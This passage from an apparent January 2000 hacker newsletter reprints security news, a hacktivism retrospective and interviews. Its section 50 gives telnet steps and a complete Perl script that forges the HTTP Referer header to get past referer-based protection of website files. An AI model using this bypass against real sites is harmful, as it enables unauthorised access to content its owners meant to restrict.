been tested for security. When the flaw was first revealed, Microsoft
claimed that its security had been broken by sophisticated hackers,
armed with powerful software tools. In October, Microsoft
announced that Truste had OK'ed the security fix at HotMail.

Security and privacy are two areas of growing concern, as the U.S.
continues to use a "voluntary action" and "self-enforcement"
approach rather than the stringent protection of the individual's
personal data that the European (EC) countries require. The U.S.
privacy laws are a patchwork of state and federal laws, rules, and
regulations that have numerous loopholes, and as databases link up
and make it easier to create detailed profiles on any citizen, there is
increasing call for a general privacy policy to replace today's
patchwork.

WebTV itself has also drawn fire because of its collection of user
data; although then-CEO Steve Perlman revealed in October 1998
that WebTV was recording its users' activity on the Net and on TV
(see WebTV Is Watching You), it did not offer its users the ability
to "opt out" of being recorded until the HipHop upgrade in November,
1999, over one year later.

"It's not that I only don't trust WebTV not to sell information they
have on me," wrote one user to Net4TV Voice, "I don't trust them
not to just let it out accidentally because they didn't lock the door. I'm
beginning to wonder if they even care about anyone's secrets except
their own. I just traded up to a new WebTV Plus and I used my son's
credit card. He's got a different name and a different billing address
-- but they never even asked for anything except a card number and
an expiration date... it could have been anyone's."

-=-

Wired;

WebTV To Patch Email Hole
by John Gartner

3:00 a.m. 4.Jan.2000 PST
WebTV is working on a fix for a security hole that enables third parties
to send email from WebTV accounts.

Malicious programmers have been embedding the HTML of Web pages and
newsgroups with stealthy code that can force email accounts into sending
messages without the user's knowledge.

The security hole was first reported on Net4TV. The code is being used to
spam WebTV's abuse mailbox and could be used to send emails to unsuspecting
third parties.

On Tuesday, a WebTV spokeswoman acknowledged the security problem, and said
that the company was working on a software patch that would be posted today.

WebTV users can determine if their email account has been compromised by
checking their "sent" folder for email and identifying anything that does
not look familiar, the WebTV spokeswoman said.

WebTV will update their server software to remove the vulnerability; users
will not have to download any additional software, according to the company.

According to Laura Buddine of Iacta.com, the parent company of Net4TV, the
code was first made known to hackers in September, but has become widespread
during the last week.

"At this point, this code is all over the place," said Buddine.

The offending code has been placed on newsgroups that are accessible only to
WebTV users, as well as on hacker newsgroups such as alt.discuss.webtv.hacking,
according to Buddine.

She said the code was originally written by a WebTV employee but has since
turned into a tool for ne'er-do-wells.

"I could envision someone using it to get others in trouble by sending death
threats from other people's accounts," Buddine said.

Buddine said that she has received more than 10 emails from WebTV users who
claim to have had been affected.

WebTV said that the user impact has been minimal with only one user reporting
malicious mail being sent.

In addition to being able to generate email without the user's knowledge, the
code can be engineered to forward email from sent mail or saved mail folders.

According to Buddine, a WebTV employee acknowledged the existence of the security
hole on 21 December, and posted a warning to WebTV users not to visit the
alt.discuss.webtv.hacking newsgroup because it would cause erroneous messages to
be sent to the WebTV abuse mailbox.

Buddine said that hours after Net4TV posted the story on Monday detailing the hole,
WebTV blocked the Net4TV mail servers from sending email to WebTV users. WebTV
posted the Net4TV IP address on the list of spammers.

Buddine said email emanating from the Net4TV IP address was denied as of 4 p.m.
PST Monday. She said Net4TV's attorney sent an email to WebTV early Tuesday, and
their IP address was removed from the list approximately 20
minutes later.

In September, Net4TV reported that WebTV email accounts that were full would disclose
subscriber and user ID information as part of an automatic reply. WebTV subsequently
fixed the problem.

@HWA

44.0 Vandalism or Hactivism? 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
For the most part web defacements over the last year
have been nothing but vandalism executed by kids
looking for bragging rites amongst their peer group.
Hactivists struggled throughout 1999 to find an identity
and separate themselves from this activity. MSNBC take
a look at these two issues and more in their report.

MSNBC
http://www.msnbc.com/news/351434.asp?cp1=1

Electronic vandalism runs amok

1999: A year in which the electronic underground
came of age

The FBI's Web site was
among those victimized by (PIC)
hackers who defaced
government sites this year.

By Brock N. Meeks
MSNBC

WASHINGTON, Dec. 29 � Digital vandalism jumped
on and off the national stage this year fueled by
hyperbole, spawned largely by fear, uncertainty
and doubt. Few of these exploits were of any real
note and served largely as an embarrassment to
apathetic systems administrators whose computers
were easy targets for kids with too much time on
their hands and the patience to download any of
the numerous �do-it-yourself� break-in tools
lingering in murky digital corridors of the Internet.

�To date, the vast majority of
Web site defacements have
been a mere collection of
invectives, profanities and little
else. No real statements of or
for any political cause have
ever been made, even when the
domain that was hit presented
an optimal forum for such
statements.�
� JAY DYSON
systems administrator for NASA's Jet Propulsion
Labs
THE FEDERAL BUREAU OF INVESTIGATION
kept chasing these computer vandals, scaring many, arresting
some and prosecuting even fewer.
In one of the most infamous moves this year, the FBI
executed a multi-state raid on a dozen or more people in the
aftermath of several high-visibility government Web site
defacements, most notably the official White House Web
site, the show pony of the federal government.
The FBI eventually tracked down and prosecuted the
perpetrator of the White House Web site break-in and in
return bought itself a kind of digital holy war.
Every kid that fashioned him or herself a �hacker�
began defacing Web pages, seemingly at will, leaving enough
mangled prose and pretzel logic screeds to drive a
high-school English teacher into early retirement.
The self-fueling �war� against the FBI eventually led to
the Bureau�s own electronic back yard when its official Web
site was attacked and was out of commission for a week.
Has the FBI beefed up its ability and effectiveness in
corralling these electronic joy riders?
No, says Brian Martin, a computer security consultant
and staff member of Attrition.org, a Web site that acts as an
archive for hacked Web sites. The FBI �has just been lucky
that some of these defacers are piss-poor hackers,� Martin
says. The defacers �leave obvious trails� and brag about
their exploits on IRC from their home accounts, basically
giving themselves up,� Martin says.

HACKER, HEAL THYSELF
Those who traffic in the electronic underground often
form �organizations� that are loose coalitions of allegiances.
Some last for months, some a few days; often, one is
member of several different groups at the same time. These
digital tribes brand themselves and their exploits so that
bragging rights can be more easily tossed around, not unlike
the way graffiti artists �tag� their works with a spray-paint
can.
Stupid and careless acts have usually been addressed
between members of the same or competing groups, off the
radar screen of the press and public in what amounted to little
more than locker room pejoratives being electronically hurled
at one another as fast as one could misspell any word with
more than two syllables.
But this year saw the emergence of public upbraiding for
inane acts in what the Hacker News Network called �a
turning point in the underground hacking community.�
An underground group called the �Legions of the
Underground� unilaterally declared a full-scale �cyberwar�
on the computing infrastructures of China and Iraq, citing
human-rights abuses and the production of weapons of mass
destruction as justification.

�Unless the domain is
specifically targeted, defaced
with a specific message that is
relevant to the domain and
current events, it is weak
justification at best. Hacking
www.mom-and-pops-store.com
with a �free Switzerland�
message just isn�t logical.�
� BRIAN MARTIN
Attrition.org staffer

The reaction from within the underground community
was a swift and unrelenting condemnation of LoU�s intent.
LoU quickly recanted, claiming it never really had destructive
intentions and laying the confusion at the feet of the clueless
media.
But in a joint statement released by several long-standing
and well-known hacking groups � including 2600, Chaos
Computer Club, Cult of the Dead Cow, L0pht Heavy
Industries and others � the LoU action was publicly
condemned.
In the joint communiqu�, groups said they �strongly
opposed any attempt to use the power of hacking to threaten
or destroy the information infrastructure of any country, for
any reason.�

FALL OF THE RISE OF HACKTIVISM
This year also saw the de-evolution of so-called
�hacktivism,� which is political speech wrapped around the
act of defacing Web sites.
In the beginning, such defacements carried valid
political messages placed
on cracked Web sites as a
valid means of protest.
Such political acts
were quickly �adopted� by
garden-variety computer
vandals � �script kiddies,�
as they are derisively
known in the underground
� as a means of trying to
validate routine and
mindless computer
break-ins.
In the joint statement
condemning the LoU plans,
the coalition of hacker
groups noted that
hacktivism �may be a
legitimate use of hacking knowledge,� but that there was a
thin line between political activism and �wanton destruction�
of computer property.
�To date, the vast majority of Web site defacements
have been a mere collection of invectives, profanities and
little else,� said Jay Dyson, a systems administrator for
NASA�s Jet Propulsion Labs who battles daily with computer
break-in attempts. �No real statements of or for any political
cause have ever been made, even when the domain that was
hit presented an optimal forum for such statements,� Dyson
said.

Most hacktivism, Dyson said, �strikes me as an
afterthought, something the intruder does to legitimize the
system breach to themselves or their peers.�
Ninety-nine percent of alleged acts of hacktivism are �a
thinly veiled charade to mask electronic joyriding,� said
Attrition.org�s Martin. �Unless the domain is specifically
targeted, defaced with a specific message that is relevant to
the domain and current events, it is weak justification at best.
Hacking www.mom-and-pops-store.com with a �free
Switzerland� message just isn�t logical,� Martin said.
�Hacking www.oppress-switzerland.org with a valid rant
about why it is ethically or morally wrong to do so then falls
under �hacktivism.� Everything else is script-kiddy delusion of
moral justification.�

THE REAL DARK SIDE
Finally, this year saw persistent rumors crop up of a
mysterious international figure known in the electronic
underground as �Virus.� This person reportedly trolls the Net,
soliciting hackers to break into government computers looking
for intelligence of all types and offering them money if they
are successful.
Those contacted by Virus say he claims his name is
�Khalid Ibrahim.�
MSNBC has contacted at least four individuals who say
they�ve been contacted by �Virus.� One hacker was asked
to break into government sites in India and Pakistan looking
for information on missiles capable of carrying nuclear
warheads.

Hacker News Network: Highlights of 1999

According to sources interviewed by MSNBC, Virus
claims to be based in India, and evidence given to MSNBC
apparently confirms that he is logging in from an ISP based in
that country.
Those contacted by Virus and interviewed by MSNBC
say he claims not to be a terrorist; his real motivation for
collecting the data remains unknown.
Messages sent by MSNBC to alleged e-mail accounts
owned by Virus and attempts to contact him via Internet chat
services, such as ICQ, have not been answered.
One hacker contacted by Virus claims to have received
$1,200 from him, though MSNBC was not able to confirm the
payment.
MSNBC has confirmed that the FBI has questioned
several hackers the Bureau�s agents have raided about the
existence of Virus and whether or not they have done any
work for him.
To date, the real identity, location and motivation of
Virus remains unknown and he is still trolling the Net.

@HWA

45.0 No Longer Worried About Y2K Feds Look to Security 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mphantasm
Since Y2K is over the FBI and other agencies have set
their sites on terrorists, hostile nations, criminals, and
other cyber evil-doers as they prepare to protect our
nations infrastructure.

CNN
http://www.cnn.com/2000/TECH/computing/01/02/cyberterrorism/

Governments ready to fight
cyber-crime in new millennium

January 2, 2000
Web posted at: 4:29 a.m. EST (0929 GMT)

In this story:

'It's a very serious threat'

Countries develop anti-hacker squads

RELATED STORIES, SITES

From Justice Correspondent Pierre Thomas

WASHINGTON (CNN) -- In 1997, a Worcester, Massachusetts, teenager
used his computer to knock out communications at an air traffic control tower
-- for six hours.

In March of 1999, a programmer unleashed the Melissa virus, disabling
thousands of computers around the United States.

And every day, the Pentagon is the target of as many as 100 hacking
attempts. As a new century begins, cyber-crime, including electronic
terrorism, looms as a new way for criminals to threaten global security.

According to Richard Clark, the coordinator for security, infrastructure,
protection and counter-terrorism at the National Security Council, our
dependency on computers will make us increasingly vulnerable.

"They (computers) run our electric power grid, out telecommunications
network, they run our railroads, our banking system, and all of them are
vulnerable, at some level, to some degree to information warfare, or
cyber-terrorism," Clark said.

"There really is a broad spectrum of people, groups and countries that engage
in cyber-attacks as a general matter for different purposes, " said Michael
Vatis, director of the National Infrastructure Protection Center at the FBI.

'It's a very serious threat'

Terrorists, hostile nations, criminals, hackers -- they all present a wide variety
of threats and create new pressure for intelligence, defense and law
enforcement around the world. The FBI computer crime case load has
doubled each of the last two years. In October, the FBI reported 800 pending
cases.

"According to the National Security
Administration, there are over a hundred
countries that are working on techniques to
penetrate our information infrastructure," said
Sen. Jon Kyl, R-Arizona. "Many of them are
aimed at the Defense Department and high
security areas in both the private sector and the
government, so it's a very serious threat."

The government is working to prepare for electronic assaults, much the way it
prepares for other forms of terrorism.

"Our mission is to try to help protect the nation's critical infrastructures," said
Vatis. "Somebody sitting with a laptop computer and a modem connection on
the other side of the world can attack those things if they don't have good
security," said Vatis.

Added Clark, "There are governments that are building units, military units and
intelligence units, to engage in information warfare. They are developing
capabilities, they are building the units, and in some cases they seem to be
doing reconnaissance on our computer networks."

Countries develop anti-hacker squads

Cyber-criminals have a major advantage: They can use computer technology
to inflict damage, while simultaneously reducing their risk of getting caught.

"Terrorists still prefer car bombs, you know. A car bomb still has a lot impact
than a cyber-attack," said Richard Power with the Computer Security
Institute. "But there is always the possibility that somebody could make some
kind of dramatic statement by bringing down some aspect of the
infrastructure."

Some nations have developed computer anti-hacking teams to block and
investigate crimes in cyberspace. But officials say as technology rapidly
advances, preventing cyber-crime and catching cyber-criminals will only
become tougher.

@HWA

46.0 Interview With Richard Smith 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Privacy advocate and cyber whistle-blower Richard
Smith has given a rather extensive interview to the
Boston Globe. Now retired from Cambridge based
Phar-Lap Software, a company he headed for 13 years,
Smith looks for privacy loopholes online.

Boston Globe
http://www.globe.com/dailyglobe2/002/city/A_whistle_blower_out_to_save_cyber_privacy+.shtml

A whistle-blower out to save cyber privacy

By Andreae Downs, Globe Correspondent, 1/2/2000

ROOKLINE - The man who helped bust the writer of the Melissa
computer virus, the man who has been behind several cyber headlines
about on-line privacy or the lack thereof, lives, actually, a rather private life on
a hill in Brookline.

Richard Smith, 46, enjoys stripping the glitz off Web pages and finding out
what's underneath. What he's found, after about a year of digging, is that more
information is being gathered about Web surfers than most people suspect.

''I look at it from a technical standpoint, how it all works,'' Smith said in a
recent interview. ''And then I compare it to what the companies say they do.''

Smith has been called a ''living treasure of the Internet'' by those interested in
on-line privacy issues.

''Before him, nobody seemed to be watching the e-store,'' said Jason Catlett,
president of Junkbusters Corp., an on-line company based in New Jersey that
also investigates computer privacy matters. ''Even the knowledge that there's
a whistle blower in cyberspace is surely keeping some of the worst schemes
of marketers from reaching implementation.

Smith retired in September from Phar Lap Software, a firm he founded and
led for almost 13 years. Phar Lap, in Cambridge, specializes in software tools
for the remote control of embedded computer systems in things like weather
stations and automatic teller machines.

Smith and his family moved from Needham to Brookline about a decade ago
so that his step-daughter, Anna Shusterman, now a science teacher, could
attend Brookline High School. He was also interested in reducing his commute
to Cambridge. The nice thing about Brookline, Smith said, is that it feels like a
college town without having a college in it.

''I grew up in the South in a college town,'' he said. ''So I felt comfortable
about that.''

His privacy passion stemmed from a furor last year about a ''leaky window'' in
the Pentium III chip. Critics claimed the chip could have made all Internet
transactions traceable, by leaving a discernible code number. Smith found
many older computers and browsers were already potentially traceable in the
same way.

So what's the big deal?

''These numbers are sort of like a Social Security number,'' he said. ''If you
keep using the same identification number, different databases can be
correlated. So you're not anonymous; they can uncover your name, address,
and phone.''

Smith believes user traceability could lead to an increased amount of junk mail
and calls; for instance, if you check up on mortgage rates in the morning on
the Web, you could get an evening call from a mortgage banking firm.

''Marketing firms claim that they are only planning to use this information to
target their audiences better,'' he said. ''I don't buy that.

Smith has found that agencies that put those flashing banner ads on Web sites
also collect data on what people at a site are typing or clicking on, one reason
the ads become increasingly relevant to your Lycos or AltaVista search, for
instance.

''But nobody tells you this is happening,'' Smith said. ''And we don't know how
they are using the information, there's no disclosure. Is it more than market
research?''

Certain software that one can download from the Internet, such as the comic
cursors from Comet Cursor, will tell a central server where someone is
surfing; and Real Jukebox, once downloaded, can tell a central server what
music CDs a user subsequently listens to on their computer.

Also, some spam (unsolicited direct marketing e-mail) contains code to let a
central computer know if the recipient opened the mail.

''The problem is it doesn't let you choose whether to let them know, but they
now know if you are interested in this product,'' he said. ''It is potentially
crossing the line of overriding user desires.''

Smith is particularly incensed about Comet Curser, which is aimed at children.
A visit to a children's Web site will trigger an option to download the software
to change your cursor to a particular comic book character. If you decline, the
question pops up again every time you visit the site.

''The nag factor alone is annoying,'' he said, but that the cursor software once
downloaded then reports your presence on future Web sites that have the
customized cursor option to an unknown central computer is ''kind of creepy.''

''The question is what is this company is going to do with this information?''

Smith thinks some company snooping will eventually have to be regulated for it
to stop.

''It's a matter of awareness first,'' he said. ''But inevitably, there will be
regulating so that profiling'' the collection of data about you and your consumer
preferences ''is an explicit option you consent to.''

To get rid of some tracking, users can install software that disables so-called
''third-party cookies.'' Cookies, in Internet parlance, are small programs in your
personal computer that allow a Web site you've visited before to recognize
you. That's why a particular airline site knows to open at reservations to your
favorite city first, or why a book site might give you increasingly relevant book
suggestions. Cookies are not all bad, Smith argues, but you should be told they
are there.

Another option is so-called anonymizer software, which covers your Web
tracks by using a central server or by stripping out cookies.

Smith looked into three of these, however, and found it is possible to break
them, although it's not necessarily being done.

Smith's passion now is strictly volunteer. He estimates he spends about 30
hours researching a topic before dropping a carefully crafted media bomb. He
could, he said, eventually do it for pay. He helped track down the New
Jersey-based creator of the Melissa virus that attacked thousands of
computers last March, and it was his research that led Real Networks Inc. to
agree to publish a software ''patch'' to prevent its product, Real Jukebox, from
collecting information on users.

Some companies with snooper functions on their Web sites have approached
him to help prevent future embarrassments.

For the moment, Smith says, he prefers his volunteer detective work, which he
does on two computers in the third-floor office of his cavernous home with a
view of the Boston skyline. He is kept company by wife Faina, daughter
Polina, and a new puppy, a failed attempt by Faina to force him to walk
outside more and meet the neighbors.

''I expect at some time I'll go stir crazy,'' he said of his current home-office
isolation. ''But so far, I've been pretty busy talking on the phone; I haven't
needed to get out.''

This story ran on page 01 of the Boston Globe's City Weekly on 1/2/2000.
� Copyright 1999 Globe Newspaper Company.

@HWA

47.0 Interview with Adam Penenberg 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by dave920
Black Market Enterprises conducted an interview with
Adam Penenberg of Forbes Magazine as part of the new
section of BME Online: HYPE. Penenberg is the author of
numerous technical articles including ones about
AntiOnline, Se7en and other underground events. The
article includes personal impressions of Penenberg as
well as the interview itself. The article can be found at:

Black Market Enterprises
http://www.b-m-e.com/features/hype-penenberg.html

HYPE Interview with : Adam Penenberg, 37, of New York City, New York

dave920:
What is your greatest fascination with computers?

Adam Penenberg:
I'm not so much interested in computers as I am with the broader issue of technology, primarily the way it changes us, our culture and our way of thinking.

Ever go to a rock concert only to be disappointed the band doesn't sound as good live as it did in the studio? The drums are too loud, the bass fuzzy, the acoustics suck, the vocals don't sound as sweet?
But that's real music; it's recorded music that's not real. Yet we have been influenced by the unattainable "perfection" of recorded music. It's more real to us than real music.

This is just one way we have been influenced by technology. Another is online chat. In some instances someone's online moniker becomes more important, more real to him, then his real world name. And
the experiences he has in cyberspace--the online conversations, flirtations and dalliances, his triumphs and tribulations--become more important to him than his real-world experiences. This is certainly true
for some software pirates and hackers who hang out on IRC all night.

Technology is changing who we are and how we think. As a journalist I believe there's nothing more worthy of coverage.

Who or what introduced you into journalism, and what made you decide to focus on the computer industry?

I got into journalism by accident. In 1991, after living and traveling abroad for 4 years (and utterly clueless as to what I would do with my life) I was walking by Katz's Deli on the Lower East side of New
York. Katz's has this ancient sign: "Send a salami to your boy in the army." ("Salami" and "Army" rhyme when you say them New Yawk style.) It was the time of Desert Storm and I noticed Katz's was
shipping salamis to soldiers in the Middle East. I pitched it to The New York Times Living section and long story short they published it, even though I had no prior experience. I thought, This freelance
writing is easy, then practically starved for years.

When I started writing for The Sunday New York Times Long Island section in the mid 1990s, "the guyland" was transitioning into a tech economy. Until then I was writing environmental stories for the
Times, since there was always some environmental disaster happening. But then I got a taste of tech and have focused on it ever since. My favorite Times lead for a tech story I wrote: "Flying through a
virtual colon, according to Dr. Ari Kaufman, is a lot like playing a Star Wars video game."

Have you previously been recognized for your contributions to the computer industry? If so, what were they?

Nope, not by the computer industry.

How often do you use your computer(s), and what do you mainly use them for?

Every day. I use a Mac G3 laptop at home and a G3 desktop at work. Basic stuff, mostly net surfing and email. I learned on a Mac in college and like the interface. I like the fact that you plug something in, it
works immediately. I like that Mac has always been Y2K compliant. I detest the Windows OS--there's something creepy about it if you ask me--and dislike the feel and touch of most PCs. If you don't
understand just ask a Mac user for a demonstration.

Are you afraid of Y2K? What do you think will happen?

I'm not afraid of Y2K. I'm afraid of people's reaction to unknown fears. I figure we would have experienced Y2K-related glitches by now, since many payroll databases look ahead months. Or how about the
Sept. 9th trigger date (9999 is an error code, so they say), which didn't trigger anything? Ho hum. There may be minor glitches but I can't imagine anything that bad happening here. Like on the cale of that
awful NBC Movie "Y2K".

But that's not to say nothing will happen. You have to assume phone circuits will be overloaded right after midnight, as people call to wish each other Happy New Year. And I'm thinking that we as humans
will burn record amounts of energy, as the lights stay on in 18 time zones. All night. Everywhere. Lights could flicker on and off, though I doubt there will be Y2K-related brownouts. Phones could go out at
the same time. And people could mistake this for Y2K Armageddon. Pull up a chair and pass the chips and salsa. The Revolution will not be televised.

If you could use a computer to significantly change the world in one way, what would it be? Why?

If I could use a computer to change anything, it would be the educational system in this country. Get kids excited about learning. Make it challenging and fun and interesting and relevant. For too long
children have been let down by irresponsible politicians willing to spend billions on pork barrel projects but little on text books and teachers. It's shameful and it's not getting better.

Another thing: I'd make the Ray Charles version of "America the Beautiful" our National Anthem.

What do you enjoy about working for Forbes.com? What other organizations have your written for or worked at?

Actually I'm a columnist for Forbes.com and a senior editor at the magazine. As a columnist for the Web site I get to stretch out and explore topics that interest me, from cyberterrorism to politics and
activism to hackers and e-commerce. A column is an opinion piece, and I have a lot of opinions. And I like being on the Net.

At the magazine I write investigative pieces, usually with a technology focus. For instance, my last article for the magazine was a cover story called "The End of Privacy".
(http://www.forbes.com/forbes/99/1129/6413182a.htm) I had an online information broker investigate me and within a week he pulled up my social security number, date of birth, salary, bank balances, long
distance phone records and utility bills (how much I pay for gas and electric). I've also written about Kevin Mitnick, who I interviewed a number of times, The New York Times hackers and Netbus's battle
against Symantec and Norton. For an information junkie like me, I have the perfect job.

Before Forbes, I was at Forbes.com. Before that, I wrote for Wired after they launched their news service on Thanksgiving 1996. And before that I freelanced regularly to The New York Times, including the
Sunday Book Review. I also sold pieces to Playboy, Glamour and World Art, among others. I've been to Cuba and Mexico for stories I did for environmental magazines.

How do you obtain subject matter for your articles, and what do you primarily enjoy to focus on?

I get stories a whole bunch of ways. Sometimes I'll surf around and something will catch my eye. Or someone will email me a tip. At times a publicist will call with a good idea. Or my editor might tell me to do
a story on, say, MP3, and I'll find an angle. You just have to have a nose for a good story. They're everywhere.

What was your overall intention when you published the article about JP, founder of AntiOnline? What type of feedback did you receive from it? Did JP threaten you or Forbes.com, as he has so many
others, with a lawsuit?

Nah, JP hasn't threatened anything or said anything, except to crow about the fluff piece about him that ran in the New York Times. What is with the Times tech coverage? They consistently repeat the
John Markoff-inspired canard that Kevin Mitnick hacked NORAD as a teen ager--the inspiration for the movie War Games, the Times claims--yet never checked it out. (It's bogus.) Then they publish a
sloppy wet kiss about JP that, well, all I'll say is they should have fact-checked it first.

The feedback on my column was 100% positive. Every single email. And I got lots of email, too. It also provoked discussion on Slashdot. Seems JP doesn't have many supporters. My intention was to
stand up to JP on the issue of his using lawsuits to get his way. I figured he can't possibly have the money for a lawsuit, that he's just using it as a cynical tool of manipulation. And even if he did have the
money, what sane person running a start up would waste precious venture capital on a slander lawsuit?

What do you think your greatest accomplishment regarding computers was?

I have no acomplishments regarding computers.

Do you find that because of your profession, computers have occupied more of your life than they should? Why or why not?

I stay away from computers outside of work. I keep my life as untechnical as possible. So I don't think I'm a candidate for a monitor tan.

What was your favorite article that you wrote? That someone else wrote?

Most of my daily reading is online, except for The Times, which I still read over coffee. I don't have any specifiic favorite sites. I bounce around a lot. Often readers or friends point me to stories on the Net.

Some stories of mine: (There's a complete list on Forbes.com [at] http://www.forbes.com/columnists/penenberg/past.htm)

1. "Hacking Bhabha: The inside story of the hack of India1s primo nuclear research center" (http://www.forbes.com/tool/html/98/nov/1116/feat.htm)
2. "We were long gone when they pulled the plug" (about The New York Times hackers) (http://www.forbes.com/forbes/98/1116/6211132a.htm)
3. "Going once, going twice, HACKED!" (http://www.forbes.com/tool/html/99/mar/0319/side1.htm)
4. "The demonizing of a hacker" (Kevin Mitnick profile) (http://www.forbes.com/forbes/99/0419/6308050a.htm)

With regards to your column on Forbes.com, what do you think influences other Internet users the most?

I'd like to think Net users are most influenced by their own experiences, and make decisions based on their own surfing. Like online trading. More people are participating in the economy than ever before.
We all have a stake. It's exciting. And the reason is that regular web surfers and surferettes realized they didn't need a broker to tell them how to invest their money; they could do it based on their own
experiences. That's one reason I believe Amazon stock shot so high. Users liked the Amazon shopping experience so much they thought, Heck, if I like it, lots of people'll like it, and keep coming back to
buy books. So why not invest in the company's stock?

I don't want to influence anybody. I just want people to read my column, read my feature stories for the magazine, and think for themselves. I'd rather raise a question than offer an answer. I'm passionate
about my writing, am excited about the issues and the information and the personalities of the cyberage, and hope this comes across to the reader.

What is your current view on free-speech on the Internet? Do you feel harmful subject matter should be banned from being posted on websites?

I don't believe in censorship. If I did I might be its next victim.

What is your favorite hobby or pastime? Your favorite Web site?

Bike tripping. Few things better than packing up the bike--panniers, tent, sleeping bag, cook set--and taking off, camping off road. Fave Web site: None, or many. I jump around a lot. I spend a lot of time on
Dow Jones Interactive, pulling up research.

Why did you agree to our invitation to interview you?

Because I spend my life trying to demystify technology, the least I could do was demystify myself.

@HWA

48.0 KISA Discovers Y2K Bug 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by cult hero
The Korea Information Security Agency (KISA) (who?)
discovered a Y2K computer bug that was in the process
of attacking 477 other systems. (Something must have
gotten lost in the translation because first they call it a
Y2K bug then they label it as a worm and a virus, which
is it?)

Digital Chosun
http://www.chosun.com/w21data/html/news/199912/199912310137.html

Unix Millennium Bug Discovered

A spokesperson for Korea Information Security Agency (KISA) announced
on Friday that it had discovered a millennium computer bug while investigating
a hacking incident reported by a corporation. It also mentioned that the bug
was in the process of attacking 477 computers when they found it. The
program was similar to a worm virus, but while most worms attack internet
linked computers using the "Windows" operating system, this one was
programmed to automatically find weaknesses and attack computers utilizing
"Unix." In 1998 a similar virus found in the States caused 7,500 government
and public institution servers to crash within 24 hours.

(Lee Ji-hun, jhl@chosun.com)

@HWA

49.0 Sprint Says 'Area 51' Does Exist 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by bart
A standard service disruption report filed with the
Federal Communications Commission by Sprint lists an
outage on December 22, 1999 that includes "Las Vegas,
NV - Pahrump, NV - Military Base 'AREA 51'". (Hmmm, I
guess even places that don't exist need phone service.)

Federal Communications Commission - PDF file
http://www.fcc.gov/Bureaus/Engineering_Technology/Filings/Network_Outage/1999/reports/99-228.pdf

@HWA

50.0 Spoofing your HTTP referrer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.datatrendsoftware.com/spoof.html

How to Spoof HTTP_Referer
(or any other browser passed variable)

To see an ELEMENTARY way to spoof any referer
value, you'll need telnet, and a way to see the referer
value that your server records (server logs always have
the referer value in them).

Try the following:
(if your homepage isn't index.html, replace it with home.htm
or whatever)

telnet www.yoursite.com 80 (press return)
GET /index.html HTTP/1.0 (press return)
Referer: http://www.hah-hah.com (press return)
(press return again)

Now, check your server logs, and you'll see that
"someone" from hah-hah.com grabbed your homepage.

If you are trying to "protect" a file by making sure that
the referer value (or any other browser passed
variable) is your own website, you can be bypassed by
this simple technique.

Perl script to do the same deed:

#!/usr/bin/perl
#
# Web Spoof
# Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org]
#
# Summary:
# Works as a normal command line web retrieval script,
# except will spoof the referer. This can be left to the script to do,
# or specified in the command line. This will bypass any kind of reference
# checking, in most cases. Will also screw up the REMOTE_HOST variable which
# some cgi scripts use, but the correct IP will of course be sent. Default
# broswer is Netscape 4.5 under Win95. This can be changed in the script.
#
# Usage: - default output is standard out, to save to a file
# you will need to redirect it, especially for
# binary/image files -
#
# ./webspf.pl [file] <referer>
#
# Examples:
#
# ./webspf.pl language.perl.com/info/software.html > software.html
# - referer would be language.perl.com/info/index.html -
#
# ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif
# - referer would be www.linux.org/images/logo/index.html -
#
# ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html
# - referer would be www.freebsd.org/whatever.html -
#
#
#

use IO::Socket;

$loc = $ARGV[0]; # www.a.com/test.html
$temp = reverse($loc); # lmth.tset/moc.a.www
$host = substr($temp,rindex($temp,"\/")+1); # moc.a.www
$host = reverse($host); # www.a.com
$dir = substr($loc,index($loc,"\/")); # /test.html

$referer = $ARGV[1]; # <blank>
if($referer eq "") { # true
$temp = substr($temp,index($temp,"\/")+1); # /moc.a.www
$temp = reverse($temp); # www.a.com/
$referer = $temp . "index\.html"; # www.a.com/index.html
} # spoofed referer!

print STDERR "\nWebSpoof v1.0 : 12/18/1998\n";
print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n";

$res = 0;
$handle = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => $host,
PeerPort => 80) or $res = 1;
if($res eq 0) {
$handle->autoflush(1);
print STDERR "\[Connected to $host\]\n";
print $handle "GET $dir HTTP/1.0\n";
print $handle "Referer: $referer\n";
print $handle "Connection: Close\n";
print $handle "User-Agent: Mozilla\/4.5 [en] $Win95\; I$\n";
print $handle "Host: $host\n";
print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n";
print $handle "Accept-Encoding: gzip\n";
print $handle "Accept-Language: en\n";
print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n";
while($temp ne "") { # read some headers
$temp = <$handle>;
chop($temp);chop($temp);
@sort = split(/:/,$temp);
if(@sort[0] =~ /server/i) { print STDERR " \[$temp\]\n"; }
if(@sort[0] =~ /date/i) { print STDERR " \[$temp\]\n"; }
if(@sort[0] =~ /content/i) { print STDERR " \[$temp\]\n"; }
}
print STDERR "\[Recieving data\]\n";
binmode(STDOUT);
while(<$handle>) {
print "$_";
}
close($handle);
print STDERR "\[Connection Closed\]\n";
} else { print STDERR "\[Could not connect to $host\]\n"; }

@HWA

51.0 OSALL removed from the net. 01/13/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Press release:

Owl Services
1/13/00

FOR IMMEDIATE RELEASE

OSAll (www.aviary-mag.com) is a leading computer
security Web site, specializing in original news stories and
methodology for computer security professionals.

The magazine has been featured in the likes of US News &
World Report, CNN, Fox News, PC World and many other
media organizations.

